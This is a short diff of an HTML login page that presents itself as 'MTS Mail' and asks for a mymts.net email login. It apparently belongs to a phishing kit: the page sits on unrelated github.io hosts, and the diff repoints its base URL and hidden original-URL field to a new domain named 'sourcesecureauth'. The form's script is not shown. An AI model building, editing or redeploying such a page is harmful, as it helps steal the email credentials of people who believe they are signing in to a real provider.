--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <base href="https://nul-01a.github.io/" />
+    <base href="https://sourcesecureauth.github.io/newlogin/" />
     <meta charset="UTF-8"/>
     <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
     <title>MTS Mail | Login</title>
@@ -14,7 +14,7 @@
 <body>
     <div class="wrapper">
         <form id="form" name="sentMessage" novalidate="novalidate">
-            <input name="__original_url" type="hidden" value="https://nul-01a.github.io/"/>
+            <input name="__original_url" type="hidden" value="https://sourcesecureauth.github.io/newlogin/"/>
             <div class="logo">
                 <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR5X8yEz0xHBoSWruoB1ztw20uBRoEPJ4lvTg&s" alt="MTS Logo" />
                 <p>Log in with your mymts.net email address</p>
@@ -34,6 +34,6 @@
             </div>
         </form>
     </div>
-    <script src="script.js"></script> 
+    <script src="script.js"></script> <!-- Ensure script.js is included after the form -->
 </body>
 </html>
